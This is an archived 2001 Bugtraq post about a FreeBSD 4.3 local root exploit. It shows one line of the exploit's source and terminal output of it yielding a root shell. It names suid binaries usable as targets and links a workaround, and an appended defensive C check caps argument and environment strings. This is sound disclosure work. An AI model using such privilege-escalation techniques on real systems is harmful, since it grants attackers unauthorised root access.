Bugtraq mailing list archives

Re: FreeBSD 4.3 local root


From: "Przemyslaw Frasunek" <venglin () freebsd lublin pl>
Date: Wed, 11 Jul 2001 14:31:06 +0200

Well, after a bunch of tests I've found only two suids which gave me
suid shell:
/usr/bin/passwd
/usr/local/bin/ssh1

/usr/bin/su also works for me:

riget:venglin:~> egrep -e execl vvfreebsd.c
  if(!execl("/usr/bin/su","su","szymon",0))

riget:venglin:~> ./v
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe72
child=57660
Password:done
# id
uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)

So, quick workaround should be

Quick workaround is to limit arguments, environment and filter non-ascii
characters:

http://www.frasunek.com/sources/security/rexec/

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *
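
Added example, not part of the original post and not the code published at the URL above: a user-space C check for the policy the workaround names, which caps the number and length of argument and environment strings and rejects non-ASCII bytes before a set-uid program is executed. The limits and all function names are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdio.h>

/* Assumed limits; the post does not state any values. */
#define MAX_VEC_ENTRIES 64   /* strings allowed in argv or envp */
#define MAX_STR_LEN     256  /* bytes allowed per string */

/* 1 if s is at most MAX_STR_LEN bytes of printable ASCII, else 0. */
static int str_ok(const char *s)
{
    size_t i;
    if (s == NULL)
        return 0;
    for (i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];
        if (i >= MAX_STR_LEN)       /* string too long */
            return 0;
        if (c < 0x20 || c > 0x7e)   /* control or non-ASCII byte */
            return 0;
    }
    return 1;
}

/* 1 if the NULL-terminated vector is small enough and every entry passes. */
static int vec_ok(char *const vec[])
{
    size_t n;
    if (vec == NULL)
        return 1;                   /* no entries at all */
    for (n = 0; vec[n] != NULL; n++) {
        if (n >= MAX_VEC_ENTRIES || !str_ok(vec[n]))
            return 0;
    }
    return 1;
}

/* Policy decision to take before exec'ing a set-uid binary. */
int exec_args_allowed(char *const argv[], char *const envp[])
{
    return vec_ok(argv) && vec_ok(envp);
}

int main(int argc, char *argv[], char *envp[])
{
    (void)argc;
    /* Checks this process's own arguments and environment. */
    printf("%s\n", exec_args_allowed(argv, envp) ? "allow" : "deny");
    return 0;
}
```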

